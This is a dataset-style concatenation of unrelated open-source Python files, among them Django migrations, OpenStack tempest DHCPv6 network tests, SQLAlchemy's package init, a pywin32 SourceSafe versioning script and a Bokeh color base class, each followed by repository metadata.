'end_date': '2100-01-01'
},
)
def test_counts_view_json(self):
response = self.get_counts('json')
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(
data,
[{
'count': 1,
'email': '[email protected]',
'name': 'Weblate Test',
'words': 2
}]
)
def test_counts_view_rst(self):
response = self.get_counts('rst')
self.assertContains(response, '[email protected]')
def test_counts_view_html(self):
response = self.get_counts('html')
self.assertHTMLEqual(
response.content.decode('utf-8'),
'<table>\n'
'<tr><th>Name</th><th>Email</th><th>Words</th><th>Count</th></tr>'
'\n'
'<tr>\n<td>Weblate Test</td>\n'
'<td>[email protected]</td>\n'
'<td>2</td>\n<td>1</td>\n'
'\n</tr>\n</table>'
)
| gpl-3.0 | 8,745,143,199,600,205,000 | 29.284848 | 78 | 0.537723 | false |
praekelt/seed-stage-based-messaging | subscriptions/migrations/0003_auto_20160322_1534.py | 2 | 1901 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-03-22 15:34
from __future__ import unicode_literals
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("contentstore", "0002_messageset_content_type"),
("subscriptions", "0002_auto_20160224_0822"),
]
operations = [
migrations.RemoveField(model_name="subscription", name="messageset_id"),
migrations.AddField(
model_name="subscription",
name="messageset",
field=models.ForeignKey(
default=1,
on_delete=django.db.models.deletion.CASCADE,
related_name="subscriptions",
to="contentstore.MessageSet",
),
preserve_default=False,
),
migrations.AlterField(
model_name="subscription",
name="created_by",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="subscriptions_created",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AlterField(
model_name="subscription",
name="schedule",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="subscriptions",
to="contentstore.Schedule",
),
),
migrations.AlterField(
model_name="subscription",
name="updated_by",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="subscriptions_updated",
to=settings.AUTH_USER_MODEL,
),
),
]
| bsd-3-clause | -1,693,147,647,634,246,400 | 31.220339 | 80 | 0.54708 | false |
makinacorpus/ionyweb | ionyweb/administration/views/action.py | 2 | 2947 | # -*- coding: utf-8 -*-
from django.conf import settings
from django.core.urlresolvers import resolve
from django.http import Http404
from djangorestframework.response import ErrorResponse
from djangorestframework import status
from ionyweb.plugin.models import PluginRelation
from ionyweb.administration.views import IsAdminView
from ionyweb.administration.utils import MESSAGES, check_object_html_id
class ActionView(IsAdminView):
"""
Views dispatcher for actions of objects.
"""
def base_view(self, request, html_id_object, url_action):
"""
Basic View of actions admin.
        This method gets the object related to the request
        and returns the requested action.
"""
# Get and check app/plugin object HTML ID
# Types accepted : PluginRelation or App
# If slug not valid => raise HTTP_400_BAD_REQUEST
object_type, object_id = check_object_html_id(
html_id_object, types=[settings.SLUG_PLUGIN, settings.SLUG_APP])
# Case #1 - Object Type : PluginRelation
if object_type == settings.SLUG_PLUGIN:
# Get plugin relation
try:
obj_relation = PluginRelation.objects\
.get(id__exact=object_id)
except PluginRelation.DoesNotExist:
# If the plugin is not found => 404
raise ErrorResponse(status.HTTP_404_NOT_FOUND,
{'msg': MESSAGES.get('default_error', "")})
# Get plugin object
obj = obj_relation.content_object
# Case #2 - Object Type : App
# Necessarily : object_type == settings.SLUG_APP:
else:
# Get app object
obj = request.page.app_page_object
# We check that slug parameter is correct
if obj.pk != int(object_id):
raise ErrorResponse(status.HTTP_404_NOT_FOUND,
{'msg': MESSAGES.get('default_error', "")})
# Formatting url action
# (add '/' at the begining and the ending)
if url_action[0] != '/':
url_action = '/' + url_action
if url_action[-1] != '/':
url_action = url_action + '/'
# Dispatcher View
try:
match = resolve(url_action, urlconf=obj.get_actions_urlconf())
return match.func(request, html_id_object, obj, **match.kwargs)
except Http404:
raise ErrorResponse(status.HTTP_404_NOT_FOUND,
{'msg': MESSAGES.get('action_not_found', "")})
def get(self, *args, **kwargs):
return self.base_view(*args, **kwargs)
def put(self, *args, **kwargs):
return self.base_view(*args, **kwargs)
def post(self, *args, **kwargs):
return self.base_view(*args, **kwargs)
def delete(self, *args, **kwargs):
return self.base_view(*args, **kwargs)
| bsd-3-clause | 2,270,526,240,031,009,300 | 35.382716 | 79 | 0.582626 | false |
EvaSDK/sqlalchemy | lib/sqlalchemy/__init__.py | 6 | 2113 | # sqlalchemy/__init__.py
# Copyright (C) 2005-2015 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from .sql import (
alias,
and_,
asc,
between,
bindparam,
case,
cast,
collate,
column,
delete,
desc,
distinct,
except_,
except_all,
exists,
extract,
false,
func,
funcfilter,
insert,
intersect,
intersect_all,
join,
literal,
literal_column,
modifier,
not_,
null,
or_,
outerjoin,
outparam,
over,
select,
subquery,
table,
text,
true,
tuple_,
type_coerce,
union,
union_all,
update,
)
from .types import (
BIGINT,
BINARY,
BLOB,
BOOLEAN,
BigInteger,
Binary,
Boolean,
CHAR,
CLOB,
DATE,
DATETIME,
DECIMAL,
Date,
DateTime,
Enum,
FLOAT,
Float,
INT,
INTEGER,
Integer,
Interval,
LargeBinary,
NCHAR,
NVARCHAR,
NUMERIC,
Numeric,
PickleType,
REAL,
SMALLINT,
SmallInteger,
String,
TEXT,
TIME,
TIMESTAMP,
Text,
Time,
TypeDecorator,
Unicode,
UnicodeText,
VARBINARY,
VARCHAR,
)
from .schema import (
CheckConstraint,
Column,
ColumnDefault,
Constraint,
DefaultClause,
FetchedValue,
ForeignKey,
ForeignKeyConstraint,
Index,
MetaData,
PassiveDefault,
PrimaryKeyConstraint,
Sequence,
Table,
ThreadLocalMetaData,
UniqueConstraint,
DDL,
)
from .inspection import inspect
from .engine import create_engine, engine_from_config
__version__ = '1.1.0b1'
def __go(lcls):
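    # Import ``events`` for its registration side effects, build the
    # package-level ``__all__`` from every public (non-underscore,
    # non-module) name imported above, then resolve the lazily declared
    # cross-module dependencies.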
global __all__
from . import events
from . import util as _sa_util
import inspect as _inspect
__all__ = sorted(name for name, obj in lcls.items()
if not (name.startswith('_') or _inspect.ismodule(obj)))
_sa_util.dependencies.resolve_all("sqlalchemy")
__go(locals())
| mit | -3,461,235,421,455,484,000 | 14.311594 | 77 | 0.587317 | false |
roopali8/tempest | tempest/api/network/test_dhcp_ipv6.py | 9 | 18480 | # Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
import random
import six
from tempest_lib.common.utils import data_utils
from tempest_lib import exceptions as lib_exc
from tempest.api.network import base
from tempest import config
from tempest import test
CONF = config.CONF
class NetworksTestDHCPv6(base.BaseNetworkTest):
_ip_version = 6
""" Test DHCPv6 specific features using SLAAC, stateless and
stateful settings for subnets. Also it shall check dual-stack
functionality (IPv4 + IPv6 together).
The tests include:
generating of SLAAC EUI-64 address in subnets with various settings
receiving SLAAC addresses in combinations of various subnets
receiving stateful IPv6 addresses
addressing in subnets with router
"""
@classmethod
def skip_checks(cls):
super(NetworksTestDHCPv6, cls).skip_checks()
msg = None
if not CONF.network_feature_enabled.ipv6:
msg = "IPv6 is not enabled"
elif not CONF.network_feature_enabled.ipv6_subnet_attributes:
msg = "DHCPv6 attributes are not enabled."
if msg:
raise cls.skipException(msg)
@classmethod
def resource_setup(cls):
super(NetworksTestDHCPv6, cls).resource_setup()
cls.network = cls.create_network()
def _remove_from_list_by_index(self, things_list, elem):
for index, i in enumerate(things_list):
if i['id'] == elem['id']:
break
del things_list[index]
def _clean_network(self):
body = self.client.list_ports()
ports = body['ports']
for port in ports:
if (port['device_owner'].startswith('network:router_interface')
and port['device_id'] in [r['id'] for r in self.routers]):
self.client.remove_router_interface_with_port_id(
port['device_id'], port['id']
)
else:
if port['id'] in [p['id'] for p in self.ports]:
self.client.delete_port(port['id'])
self._remove_from_list_by_index(self.ports, port)
body = self.client.list_subnets()
subnets = body['subnets']
for subnet in subnets:
if subnet['id'] in [s['id'] for s in self.subnets]:
self.client.delete_subnet(subnet['id'])
self._remove_from_list_by_index(self.subnets, subnet)
body = self.client.list_routers()
routers = body['routers']
for router in routers:
if router['id'] in [r['id'] for r in self.routers]:
self.client.delete_router(router['id'])
self._remove_from_list_by_index(self.routers, router)
def _get_ips_from_subnet(self, **kwargs):
subnet = self.create_subnet(self.network, **kwargs)
port_mac = data_utils.rand_mac_address()
port = self.create_port(self.network, mac_address=port_mac)
real_ip = next(iter(port['fixed_ips']), None)['ip_address']
eui_ip = data_utils.get_ipv6_addr_by_EUI64(subnet['cidr'],
port_mac).format()
return real_ip, eui_ip
@test.idempotent_id('e5517e62-6f16-430d-a672-f80875493d4c')
def test_dhcpv6_stateless_eui64(self):
"""When subnets configured with RAs SLAAC (AOM=100) and DHCP stateless
(AOM=110) both for radvd and dnsmasq, port shall receive IP address
calculated from its MAC.
"""
for ra_mode, add_mode in (
('slaac', 'slaac'),
('dhcpv6-stateless', 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
real_ip, eui_ip = self._get_ips_from_subnet(**kwargs)
self._clean_network()
self.assertEqual(eui_ip, real_ip,
('Real port IP is %s, but shall be %s when '
'ipv6_ra_mode=%s and ipv6_address_mode=%s') % (
real_ip, eui_ip, ra_mode, add_mode))
@test.idempotent_id('ae2f4a5d-03ff-4c42-a3b0-ce2fcb7ea832')
def test_dhcpv6_stateless_no_ra(self):
"""When subnets configured with dnsmasq SLAAC and DHCP stateless
and there is no radvd, port shall receive IP address calculated
from its MAC and mask of subnet.
"""
for ra_mode, add_mode in (
(None, 'slaac'),
(None, 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
kwargs = {k: v for k, v in six.iteritems(kwargs) if v}
real_ip, eui_ip = self._get_ips_from_subnet(**kwargs)
self._clean_network()
self.assertEqual(eui_ip, real_ip,
('Real port IP %s shall be equal to EUI-64 %s'
'when ipv6_ra_mode=%s,ipv6_address_mode=%s') % (
real_ip, eui_ip,
ra_mode if ra_mode else "Off",
add_mode if add_mode else "Off"))
@test.idempotent_id('81f18ef6-95b5-4584-9966-10d480b7496a')
def test_dhcpv6_invalid_options(self):
"""Different configurations for radvd and dnsmasq are not allowed"""
for ra_mode, add_mode in (
('dhcpv6-stateless', 'dhcpv6-stateful'),
('dhcpv6-stateless', 'slaac'),
('slaac', 'dhcpv6-stateful'),
('dhcpv6-stateful', 'dhcpv6-stateless'),
('dhcpv6-stateful', 'slaac'),
('slaac', 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
self.assertRaises(lib_exc.BadRequest,
self.create_subnet,
self.network,
**kwargs)
@test.idempotent_id('21635b6f-165a-4d42-bf49-7d195e47342f')
def test_dhcpv6_stateless_no_ra_no_dhcp(self):
"""If no radvd option and no dnsmasq option is configured
port shall receive IP from fixed IPs list of subnet.
"""
real_ip, eui_ip = self._get_ips_from_subnet()
self._clean_network()
self.assertNotEqual(eui_ip, real_ip,
('Real port IP %s equal to EUI-64 %s when '
'ipv6_ra_mode=Off and ipv6_address_mode=Off,'
'but shall be taken from fixed IPs') % (
real_ip, eui_ip))
@test.idempotent_id('4544adf7-bb5f-4bdc-b769-b3e77026cef2')
def test_dhcpv6_two_subnets(self):
"""When one IPv6 subnet configured with dnsmasq SLAAC or DHCP stateless
and other IPv6 is with DHCP stateful, port shall receive EUI-64 IP
addresses from first subnet and DHCP address from second one.
Order of subnet creating should be unimportant.
"""
for order in ("slaac_first", "dhcp_first"):
for ra_mode, add_mode in (
('slaac', 'slaac'),
('dhcpv6-stateless', 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
kwargs_dhcp = {'ipv6_address_mode': 'dhcpv6-stateful'}
if order == "slaac_first":
subnet_slaac = self.create_subnet(self.network, **kwargs)
subnet_dhcp = self.create_subnet(
self.network, **kwargs_dhcp)
else:
subnet_dhcp = self.create_subnet(
self.network, **kwargs_dhcp)
subnet_slaac = self.create_subnet(self.network, **kwargs)
port_mac = data_utils.rand_mac_address()
eui_ip = data_utils.get_ipv6_addr_by_EUI64(
subnet_slaac['cidr'],
port_mac
).format()
port = self.create_port(self.network, mac_address=port_mac)
real_ips = dict([(k['subnet_id'], k['ip_address'])
for k in port['fixed_ips']])
real_dhcp_ip, real_eui_ip = [real_ips[sub['id']]
for sub in [subnet_dhcp,
subnet_slaac]]
self.client.delete_port(port['id'])
self.ports.pop()
body = self.client.list_ports()
ports_id_list = [i['id'] for i in body['ports']]
self.assertNotIn(port['id'], ports_id_list)
self._clean_network()
self.assertEqual(real_eui_ip,
eui_ip,
'Real IP is {0}, but shall be {1}'.format(
real_eui_ip,
eui_ip))
msg = ('Real IP address is {0} and it is NOT on '
'subnet {1}'.format(real_dhcp_ip, subnet_dhcp['cidr']))
self.assertIn(netaddr.IPAddress(real_dhcp_ip),
netaddr.IPNetwork(subnet_dhcp['cidr']), msg)
@test.idempotent_id('4256c61d-c538-41ea-9147-3c450c36669e')
def test_dhcpv6_64_subnets(self):
"""When one IPv6 subnet configured with dnsmasq SLAAC or DHCP stateless
and other IPv4 is with DHCP of IPv4, port shall receive EUI-64 IP
addresses from first subnet and IPv4 DHCP address from second one.
Order of subnet creating should be unimportant.
"""
for order in ("slaac_first", "dhcp_first"):
for ra_mode, add_mode in (
('slaac', 'slaac'),
('dhcpv6-stateless', 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
if order == "slaac_first":
subnet_slaac = self.create_subnet(self.network, **kwargs)
subnet_dhcp = self.create_subnet(
self.network, ip_version=4)
else:
subnet_dhcp = self.create_subnet(
self.network, ip_version=4)
subnet_slaac = self.create_subnet(self.network, **kwargs)
port_mac = data_utils.rand_mac_address()
eui_ip = data_utils.get_ipv6_addr_by_EUI64(
subnet_slaac['cidr'],
port_mac
).format()
port = self.create_port(self.network, mac_address=port_mac)
real_ips = dict([(k['subnet_id'], k['ip_address'])
for k in port['fixed_ips']])
real_dhcp_ip, real_eui_ip = [real_ips[sub['id']]
for sub in [subnet_dhcp,
subnet_slaac]]
self._clean_network()
self.assertEqual(real_eui_ip,
eui_ip,
'Real IP is {0}, but shall be {1}'.format(
real_eui_ip,
eui_ip))
msg = ('Real IP address is {0} and it is NOT on '
'subnet {1}'.format(real_dhcp_ip, subnet_dhcp['cidr']))
self.assertIn(netaddr.IPAddress(real_dhcp_ip),
netaddr.IPNetwork(subnet_dhcp['cidr']), msg)
@test.idempotent_id('4ab211a0-276f-4552-9070-51e27f58fecf')
def test_dhcp_stateful(self):
"""With all options below, DHCPv6 shall allocate address
from subnet pool to port.
"""
for ra_mode, add_mode in (
('dhcpv6-stateful', 'dhcpv6-stateful'),
('dhcpv6-stateful', None),
(None, 'dhcpv6-stateful'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
kwargs = {k: v for k, v in six.iteritems(kwargs) if v}
subnet = self.create_subnet(self.network, **kwargs)
port = self.create_port(self.network)
port_ip = next(iter(port['fixed_ips']), None)['ip_address']
self._clean_network()
msg = ('Real IP address is {0} and it is NOT on '
'subnet {1}'.format(port_ip, subnet['cidr']))
self.assertIn(netaddr.IPAddress(port_ip),
netaddr.IPNetwork(subnet['cidr']), msg)
@test.idempotent_id('51a5e97f-f02e-4e4e-9a17-a69811d300e3')
def test_dhcp_stateful_fixedips(self):
"""With all options below, port shall be able to get
requested IP from fixed IP range not depending on
DHCP stateful (not SLAAC!) settings configured.
"""
for ra_mode, add_mode in (
('dhcpv6-stateful', 'dhcpv6-stateful'),
('dhcpv6-stateful', None),
(None, 'dhcpv6-stateful'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
kwargs = {k: v for k, v in six.iteritems(kwargs) if v}
subnet = self.create_subnet(self.network, **kwargs)
ip_range = netaddr.IPRange(subnet["allocation_pools"][0]["start"],
subnet["allocation_pools"][0]["end"])
ip = netaddr.IPAddress(random.randrange(ip_range.first,
ip_range.last)).format()
port = self.create_port(self.network,
fixed_ips=[{'subnet_id': subnet['id'],
'ip_address': ip}])
port_ip = next(iter(port['fixed_ips']), None)['ip_address']
self._clean_network()
self.assertEqual(port_ip, ip,
("Port IP %s is not as fixed IP from "
"port create request: %s") % (
port_ip, ip))
@test.idempotent_id('98244d88-d990-4570-91d4-6b25d70d08af')
def test_dhcp_stateful_fixedips_outrange(self):
"""When port gets IP address from fixed IP range it
shall be checked if it's from subnets range.
"""
kwargs = {'ipv6_ra_mode': 'dhcpv6-stateful',
'ipv6_address_mode': 'dhcpv6-stateful'}
subnet = self.create_subnet(self.network, **kwargs)
ip_range = netaddr.IPRange(subnet["allocation_pools"][0]["start"],
subnet["allocation_pools"][0]["end"])
ip = netaddr.IPAddress(random.randrange(
ip_range.last + 1, ip_range.last + 10)).format()
self.assertRaises(lib_exc.BadRequest,
self.create_port,
self.network,
fixed_ips=[{'subnet_id': subnet['id'],
'ip_address': ip}])
@test.idempotent_id('57b8302b-cba9-4fbb-8835-9168df029051')
def test_dhcp_stateful_fixedips_duplicate(self):
"""When port gets IP address from fixed IP range it
shall be checked if it's not duplicate.
"""
kwargs = {'ipv6_ra_mode': 'dhcpv6-stateful',
'ipv6_address_mode': 'dhcpv6-stateful'}
subnet = self.create_subnet(self.network, **kwargs)
ip_range = netaddr.IPRange(subnet["allocation_pools"][0]["start"],
subnet["allocation_pools"][0]["end"])
ip = netaddr.IPAddress(random.randrange(
ip_range.first, ip_range.last)).format()
self.create_port(self.network,
fixed_ips=[
{'subnet_id': subnet['id'],
'ip_address': ip}])
self.assertRaisesRegexp(lib_exc.Conflict,
"object with that identifier already exists",
self.create_port,
self.network,
fixed_ips=[{'subnet_id': subnet['id'],
'ip_address': ip}])
def _create_subnet_router(self, kwargs):
subnet = self.create_subnet(self.network, **kwargs)
router = self.create_router(
router_name=data_utils.rand_name("routerv6-"),
admin_state_up=True)
port = self.create_router_interface(router['id'],
subnet['id'])
body = self.client.show_port(port['port_id'])
return subnet, body['port']
@test.idempotent_id('e98f65db-68f4-4330-9fea-abd8c5192d4d')
def test_dhcp_stateful_router(self):
"""With all options below the router interface shall
receive DHCPv6 IP address from allocation pool.
"""
for ra_mode, add_mode in (
('dhcpv6-stateful', 'dhcpv6-stateful'),
('dhcpv6-stateful', None),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
kwargs = {k: v for k, v in six.iteritems(kwargs) if v}
subnet, port = self._create_subnet_router(kwargs)
port_ip = next(iter(port['fixed_ips']), None)['ip_address']
self._clean_network()
self.assertEqual(port_ip, subnet['gateway_ip'],
("Port IP %s is not as first IP from "
"subnets allocation pool: %s") % (
port_ip, subnet['gateway_ip']))
def tearDown(self):
self._clean_network()
super(NetworksTestDHCPv6, self).tearDown()
| apache-2.0 | -4,462,429,140,617,705,500 | 46.384615 | 79 | 0.518074 | false |
huguesv/PTVS | Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/win32/scripts/VersionStamp/vssutil.py | 6 | 4694 | import win32con, string, traceback
import win32com.client, win32com.client.gencache
import pythoncom
import time
import os
constants = win32com.client.constants
win32com.client.gencache.EnsureModule('{783CD4E0-9D54-11CF-B8EE-00608CC9A71F}', 0, 5, 0)
error = "vssutil error"
def GetSS():
ss=win32com.client.Dispatch("SourceSafe")
    # SS seems a bit weird.  It defaults the arguments as empty strings, but
# then complains when they are used - so we pass "Missing"
ss.Open(pythoncom.Missing, pythoncom.Missing, pythoncom.Missing)
return ss
def test(projectName):
ss=GetSS()
project = ss.VSSItem(projectName)
for item in project.GetVersions(constants.VSSFLAG_RECURSYES):
print(item.VSSItem.Name, item.VersionNumber, item.Action)
# item=i.Versions[0].VSSItem
# for h in i.Versions:
# print `h.Comment`, h.Action, h.VSSItem.Name
def SubstituteInString(inString, evalEnv):
substChar = "$"
fields = string.split(inString, substChar)
newFields = []
for i in range(len(fields)):
didSubst = 0
strVal = fields[i]
if i%2!=0:
try:
strVal = eval(strVal,evalEnv[0], evalEnv[1])
newFields.append(strVal)
didSubst = 1
except:
traceback.print_exc()
print("Could not substitute", strVal)
if not didSubst:
newFields.append(strVal)
return string.join(map(str, newFields), "")
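# A rough usage sketch (hypothetical values): the fields between '$' markers
# are evaluated against the supplied (locals, globals) pair, so
#   SubstituteInString("Build $buildNo$ at $now$", (locals(), globals()))
# would yield e.g. "Build 42 at Mon Jan 01 ..." when buildNo and now are
# defined in the calling scope; fields that fail to evaluate are kept as-is.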
def SubstituteInFile(inName, outName, evalEnv):
inFile = open(inName, "r")
try:
outFile = open(outName, "w")
try:
while 1:
line = inFile.read()
if not line: break
outFile.write(SubstituteInString(line, evalEnv))
finally:
outFile.close()
finally:
inFile.close()
def VssLog(project, linePrefix = "", noLabels = 5, maxItems=150):
lines = []
num = 0
labelNum = 0
for i in project.GetVersions(constants.VSSFLAG_RECURSYES):
num = num + 1
if num > maxItems : break
commentDesc = itemDesc = ""
if i.Action[:5]=="Added":
continue
if len(i.Label):
labelNum = labelNum + 1
itemDesc = i.Action
else:
itemDesc = i.VSSItem.Name
if str(itemDesc[-4:])==".dsp":
continue
if i.Comment:
commentDesc ="\n%s\t%s" % (linePrefix, i.Comment)
lines.append("%s%s\t%s%s" % (linePrefix, time.asctime(time.localtime(int(i.Date))), itemDesc, commentDesc))
if labelNum > noLabels:
break
return string.join(lines,"\n")
def SubstituteVSSInFile(projectName, inName, outName):
import win32api
if win32api.GetFullPathName(inName)==win32api.GetFullPathName(outName):
raise RuntimeError("The input and output filenames can not be the same")
sourceSafe=GetSS()
project = sourceSafe.VSSItem(projectName)
# Find the last label
label = None
for version in project.Versions:
if version.Label:
break
else:
print("Couldnt find a label in the sourcesafe project!")
return
# Setup some local helpers for the conversion strings.
vss_label = version.Label
vss_date = time.asctime(time.localtime(int(version.Date)))
now = time.asctime(time.localtime(time.time()))
SubstituteInFile(inName, outName, (locals(),globals()))
def CountCheckouts(item):
num = 0
if item.Type==constants.VSSITEM_PROJECT:
for sub in item.Items:
num = num + CountCheckouts(sub)
else:
if item.IsCheckedOut:
num = num + 1
return num
def GetLastBuildNo(project):
i = GetSS().VSSItem(project)
# Find the last label
lab = None
for version in i.Versions:
lab = str(version.Label)
if lab: return lab
return None
def MakeNewBuildNo(project, buildDesc = None, auto=0, bRebrand = 0):
if buildDesc is None: buildDesc = "Created by Python"
ss = GetSS()
i = ss.VSSItem(project)
num = CountCheckouts(i)
if num > 0:
msg = "This project has %d items checked out\r\n\r\nDo you still want to continue?" % num
import win32ui
if win32ui.MessageBox(msg, project, win32con.MB_YESNO) != win32con.IDYES:
return
oldBuild = buildNo = GetLastBuildNo(project)
if buildNo is None:
buildNo = "1"
oldBuild = "<None>"
else:
try:
buildNo = string.atoi(buildNo)
if not bRebrand: buildNo = buildNo + 1
buildNo = str(buildNo)
except ValueError:
raise error("The previous label could not be incremented: %s" % (oldBuild))
if not auto:
from pywin.mfc import dialog
buildNo = dialog.GetSimpleInput("Enter new build number", buildNo, "%s - Prev: %s" % (project, oldBuild))
if buildNo is None: return
i.Label(buildNo, "Build %s: %s" % (buildNo,buildDesc))
if auto:
print("Branded project %s with label %s" % (project, buildNo))
return buildNo
if __name__=='__main__':
# UpdateWiseExeName("PyWiseTest.wse", "PyWiseTest-10.exe")
# MakeVersion()
# test(tp)
# MakeNewBuildNo(tp)
tp = "\\Python\\Python Win32 Extensions"
SubstituteVSSInFile(tp, "d:\\src\\pythonex\\win32\\win32.txt", "d:\\temp\\win32.txt")
| apache-2.0 | -1,498,354,072,023,844,600 | 26.611765 | 109 | 0.702599 | false |
edx/edx-enterprise | tests/test_integrated_channels/test_lms_utils.py | 1 | 2824 | # -*- coding: utf-8 -*-
"""
Tests for the lms_utils used by integration channels.
"""
import unittest
import mock
import pytest
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from integrated_channels.lms_utils import get_course_certificate, get_course_details, get_single_user_grade
from test_utils import factories
A_GOOD_COURSE_ID = "edX/DemoX/Demo_Course"
A_BAD_COURSE_ID = "this_shall_not_pass"
A_LMS_USER = "a_lms_user"
@pytest.mark.django_db
class TestLMSUtils(unittest.TestCase):
"""
Tests for lms_utils
"""
def setUp(self):
self.username = A_LMS_USER
self.user = factories.UserFactory(username=self.username)
super().setUp()
@mock.patch('integrated_channels.lms_utils.get_certificate_for_user')
def test_get_course_certificate_success(self, mock_get_course_certificate):
a_cert = {
"username": A_LMS_USER,
"grade": "0.98",
}
mock_get_course_certificate.return_value = a_cert
cert = get_course_certificate(A_GOOD_COURSE_ID, self.user)
assert cert == a_cert
assert mock_get_course_certificate.call_count == 1
@mock.patch('integrated_channels.lms_utils.get_certificate_for_user')
def test_get_course_certificate_bad_course_id_throws(self, mock_get_course_certificate):
with pytest.raises(InvalidKeyError):
get_course_certificate(A_BAD_COURSE_ID, self.user)
assert mock_get_course_certificate.call_count == 0
@mock.patch('integrated_channels.lms_utils.CourseGradeFactory')
def test_get_single_user_grade_success(self, mock_course_grade_factory):
expected_grade = "0.8"
mock_course_grade_factory.return_value.read.return_value = expected_grade
single_user_grade = get_single_user_grade(A_GOOD_COURSE_ID, self.user)
assert single_user_grade == expected_grade
mock_course_grade_factory.return_value.read.assert_called_with(
self.user,
course_key=CourseKey.from_string(A_GOOD_COURSE_ID)
)
@mock.patch('integrated_channels.lms_utils.CourseGradeFactory')
def test_get_single_user_grade_bad_course_id_throws(self, mock_course_grade_factory):
with pytest.raises(InvalidKeyError):
get_single_user_grade(A_BAD_COURSE_ID, self.user)
assert mock_course_grade_factory.call_count == 0
@mock.patch('integrated_channels.lms_utils.CourseOverview')
def test_get_course_details_success(self, mock_course_overview):
course_overview = {'field': 'value'}
mock_get_from_id = mock_course_overview.get_from_id
mock_get_from_id.return_value = course_overview
result_course_overview = get_course_details(A_GOOD_COURSE_ID)
assert result_course_overview == course_overview
| agpl-3.0 | -3,214,498,446,191,658,000 | 38.222222 | 107 | 0.684844 | false |
m1093782566/openstack_org_ceilometer | ceilometer/compute/notifications/__init__.py | 6 | 1335 | #
# Copyright 2013 Intel
#
# Author: Shuangtai Tian <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
import oslo.messaging
from ceilometer import plugin
OPTS = [
cfg.StrOpt('nova_control_exchange',
default='nova',
help="Exchange name for Nova notifications."),
]
cfg.CONF.register_opts(OPTS)
class ComputeNotificationBase(plugin.NotificationBase):
@staticmethod
def get_targets(conf):
"""Return a sequence of oslo.messaging.Target
This sequence is defining the exchange and topics to be connected for
this plugin.
"""
return [oslo.messaging.Target(topic=topic,
exchange=conf.nova_control_exchange)
for topic in conf.notification_topics]
| apache-2.0 | -5,234,107,409,743,114,000 | 29.340909 | 77 | 0.692884 | false |
timsnyder/bokeh | bokeh/colors/color.py | 2 | 4822 | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Provide a base class for representing color values.
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'Color',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class Color(object):
''' A base class for representing color objects.
'''
def __repr__(self):
return self.to_css()
@staticmethod
def clamp(value, maximum=None):
''' Clamp numeric values to be non-negative, an optionally, less than a
given maximum.
Args:
value (float) :
A number to clamp.
maximum (float, optional) :
A max bound to to clamp to. If None, there is no upper bound,
and values are only clamped to be non-negative. (default: None)
Returns:
float
'''
value = max(value, 0)
if maximum is not None:
return min(value, maximum)
else:
return value
def copy(self):
''' Copy this color.
*Subclasses must implement this method.*
'''
raise NotImplementedError
def darken(self, amount):
''' Darken (reduce the luminance) of this color.
Args:
amount (float) :
Amount to reduce the luminance by (clamped above zero)
Returns:
Color
'''
hsl = self.to_hsl()
hsl.l = self.clamp(hsl.l - amount)
return self.from_hsl(hsl)
@classmethod
def from_hsl(cls, value):
''' Create a new color by converting from an HSL color.
*Subclasses must implement this method.*
Args:
value (HSL) :
A color to convert from HSL
Returns:
Color
'''
raise NotImplementedError
@classmethod
def from_rgb(cls, value):
''' Create a new color by converting from an RGB color.
*Subclasses must implement this method.*
Args:
value (:class:`~bokeh.colors.rgb.RGB`) :
A color to convert from RGB
Returns:
Color
'''
raise NotImplementedError
def lighten(self, amount):
''' Lighten (increase the luminance) of this color.
Args:
amount (float) :
Amount to increase the luminance by (clamped above zero)
Returns:
Color
'''
